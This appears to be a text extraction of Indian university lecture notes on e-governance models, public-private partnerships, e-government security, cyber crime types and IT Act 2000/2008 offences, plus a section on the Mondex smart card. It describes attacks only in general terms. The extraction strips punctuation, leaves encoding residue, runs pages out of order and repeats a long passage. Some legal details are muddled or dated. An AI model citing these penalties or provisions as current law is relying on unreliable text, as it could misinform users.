specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
